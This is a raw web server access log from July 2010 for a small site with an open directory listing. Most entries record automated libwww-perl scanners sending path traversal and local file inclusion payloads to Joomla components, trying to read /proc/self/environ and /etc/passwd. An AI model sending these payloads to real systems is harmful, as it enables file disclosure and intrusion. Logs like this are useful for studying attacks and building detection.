213.136.146.12 - - [26/Jul/2010:00:54:47 +0200] "GET / HTTP/1.1" 200 559 "http://www.comites-it.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
213.136.146.12 - - [26/Jul/2010:00:54:47 +0200] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://newark.comites-it.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
213.136.146.12 - - [26/Jul/2010:00:54:47 +0200] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://newark.comites-it.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
213.136.146.12 - - [26/Jul/2010:00:54:47 +0200] "GET /favicon.ico HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
213.136.146.12 - - [26/Jul/2010:00:54:56 +0200] "GET /logs/ HTTP/1.1" 200 796 "http://newark.comites-it.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
213.136.146.12 - - [26/Jul/2010:00:54:56 +0200] "GET /icons/back.gif HTTP/1.1" 200 216 "http://newark.comites-it.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
213.136.146.12 - - [26/Jul/2010:00:54:56 +0200] "GET /icons/unknown.gif HTTP/1.1" 200 245 "http://newark.comites-it.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
213.136.146.12 - - [26/Jul/2010:00:55:03 +0200] "GET /logs/access_log HTTP/1.1" 200 1744 "http://newark.comites-it.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
213.136.146.12 - - [26/Jul/2010:00:55:26 +0200] "GET / HTTP/1.1" 200 559 "http://newark.comites-it.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
174.120.237.175 - - [26/Jul/2010:01:13:06 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
174.120.237.175 - - [26/Jul/2010:01:13:19 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
174.120.237.175 - - [26/Jul/2010:01:13:19 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
174.120.237.175 - - [26/Jul/2010:01:13:19 +0200] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
202.160.123.72 - - [26/Jul/2010:01:13:44 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
202.160.123.72 - - [26/Jul/2010:01:14:04 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
202.160.123.72 - - [26/Jul/2010:01:14:04 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
202.160.123.72 - - [26/Jul/2010:01:14:05 +0200] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
187.45.234.152 - - [26/Jul/2010:01:34:24 +0200] "GET /logs/access_log//index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:01:34:24 +0200] "GET //index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:01:34:24 +0200] "GET /logs//index.php?option=com_zimbcore&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
178.162.133.106 - - [26/Jul/2010:01:54:49 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.823"
178.162.133.106 - - [26/Jul/2010:01:54:50 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.823"
94.247.177.18 - - [26/Jul/2010:01:54:56 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
94.247.177.18 - - [26/Jul/2010:01:54:56 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
85.93.128.40 - - [26/Jul/2010:01:55:42 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
85.93.128.40 - - [26/Jul/2010:01:55:42 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
94.247.177.18 - - [26/Jul/2010:01:56:16 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
94.247.177.18 - - [26/Jul/2010:01:56:16 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
94.247.177.18 - - [26/Jul/2010:01:56:16 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
178.162.133.106 - - [26/Jul/2010:01:56:17 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.823"
178.162.133.106 - - [26/Jul/2010:01:56:17 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.823"
178.162.133.106 - - [26/Jul/2010:01:56:18 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.823"
85.93.128.40 - - [26/Jul/2010:01:56:35 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
85.93.128.40 - - [26/Jul/2010:01:56:35 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
85.93.128.40 - - [26/Jul/2010:01:56:36 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
174.120.237.175 - - [26/Jul/2010:01:56:44 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
174.120.237.175 - - [26/Jul/2010:01:56:44 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
174.120.237.175 - - [26/Jul/2010:01:56:44 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
174.120.237.175 - - [26/Jul/2010:02:02:25 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.831"
174.120.237.175 - - [26/Jul/2010:02:02:25 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
174.120.237.175 - - [26/Jul/2010:02:02:25 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
67.195.114.225 - - [26/Jul/2010:02:10:47 +0200] "GET /robots.txt HTTP/1.0" 404 296 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.225 - - [26/Jul/2010:02:10:47 +0200] "GET /?C=S;O=D HTTP/1.0" 200 559 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
201.12.141.11 - - [26/Jul/2010:02:41:56 +0200] "GET /index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-" "-"
201.12.141.11 - - [26/Jul/2010:02:41:56 +0200] "GET /index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 295 "-" "-"
222.124.193.12 - - [26/Jul/2010:02:57:48 +0200] "GET /?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:03:35:22 +0200] "GET /logs/access_log/?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:03:35:23 +0200] "GET /?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:03:35:23 +0200] "GET /logs/?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:03:37:20 +0200] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
91.121.67.226 - - [26/Jul/2010:03:37:20 +0200] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
94.247.176.194 - - [26/Jul/2010:03:37:20 +0200] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
91.121.67.226 - - [26/Jul/2010:03:37:20 +0200] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
78.41.233.128 - - [26/Jul/2010:03:37:35 +0200] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:03:37:35 +0200] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
112.104.57.22 - - [26/Jul/2010:03:38:42 +0200] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:38:42 +0200] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:38:48 +0200] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:39:45 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:39:45 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:39:50 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:40:27 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:40:27 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:40:29 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:40:30 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:40:37 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:40:37 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:48:31 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:48:35 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:48:36 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:54:22 +0200] "GET /logs/access_log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:54:23 +0200] "GET /logs/access_log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:54:23 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:54:23 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:54:24 +0200] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:54:24 +0200] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:54:26 +0200] "GET /logs/access_log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:54:27 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:54:27 +0200] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:58:26 +0200] "GET /logs/access_log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:58:27 +0200] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:58:27 +0200] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:00:11 +0200] "GET /logs/access_log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:00:12 +0200] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:00:12 +0200] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:02:42 +0200] "GET /logs/access_log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:02:43 +0200] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:02:43 +0200] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
64.6.98.41 - - [26/Jul/2010:04:03:44 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:03:45 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:03:47 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:03:47 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
94.247.176.194 - - [26/Jul/2010:04:04:37 +0200] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:04:04:38 +0200] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
91.121.67.226 - - [26/Jul/2010:04:05:06 +0200] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:04:05:06 +0200] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
78.41.233.128 - - [26/Jul/2010:04:05:44 +0200] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:04:05:45 +0200] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
64.6.98.41 - - [26/Jul/2010:04:06:29 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:06:30 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:06:30 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:14:16 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:14:16 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:14:16 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:14:28 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:14:28 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:14:29 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:14:34 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:14:34 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:14:34 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
91.137.131.51 - - [26/Jul/2010:04:18:42 +0200] "POST //contact.php HTTP/1.1" 404 298 "-" "plaNETWORK Bot Search"
91.137.131.51 - - [26/Jul/2010:04:18:42 +0200] "POST /logs//contact.php HTTP/1.1" 404 303 "-" "plaNETWORK Bot Search"
91.137.131.51 - - [26/Jul/2010:04:18:42 +0200] "POST //contact.php HTTP/1.1" 404 298 "-" "plaNETWORK Bot Search"
91.137.131.51 - - [26/Jul/2010:04:18:42 +0200] "POST /logs/access_log//contact.php HTTP/1.1" 404 314 "-" "plaNETWORK Bot Search"
91.137.131.51 - - [26/Jul/2010:04:18:42 +0200] "POST /logs//contact.php HTTP/1.1" 404 303 "-" "plaNETWORK Bot Search"
91.137.131.51 - - [26/Jul/2010:04:18:43 +0200] "POST //contact.php HTTP/1.1" 404 298 "-" "plaNETWORK Bot Search"
91.137.131.51 - - [26/Jul/2010:04:18:43 +0200] "POST /logs/access_log//contact.php HTTP/1.1" 404 314 "-" "plaNETWORK Bot Search"
91.137.131.51 - - [26/Jul/2010:04:18:43 +0200] "POST /logs//contact.php HTTP/1.1" 404 303 "-" "plaNETWORK Bot Search"
91.137.131.51 - - [26/Jul/2010:04:18:43 +0200] "POST //contact.php HTTP/1.1" 404 298 "-" "plaNETWORK Bot Search"
91.137.131.51 - - [26/Jul/2010:04:18:43 +0200] "POST /logs/access_log//contact.php HTTP/1.1" 404 314 "-" "plaNETWORK Bot Search"
91.137.131.51 - - [26/Jul/2010:04:18:43 +0200] "POST /logs//contact.php HTTP/1.1" 404 303 "-" "plaNETWORK Bot Search"
91.137.131.51 - - [26/Jul/2010:04:18:43 +0200] "POST /logs/access_log//contact.php HTTP/1.1" 404 314 "-" "plaNETWORK Bot Search"
89.200.169.163 - - [26/Jul/2010:04:59:58 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:04:59:58 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:04:59:58 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:04:59:58 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
188.127.248.175 - - [26/Jul/2010:05:21:47 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:05:21:48 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:05:21:48 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:05:21:48 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.808"
89.200.169.163 - - [26/Jul/2010:05:21:59 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:21:59 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.813"
216.227.218.75 - - [26/Jul/2010:05:22:32 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.832"
216.227.218.75 - - [26/Jul/2010:05:22:32 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.832"
89.200.169.163 - - [26/Jul/2010:05:22:43 +0200] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:05:22:44 +0200] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 353 "-" "libwww-perl/5.813"
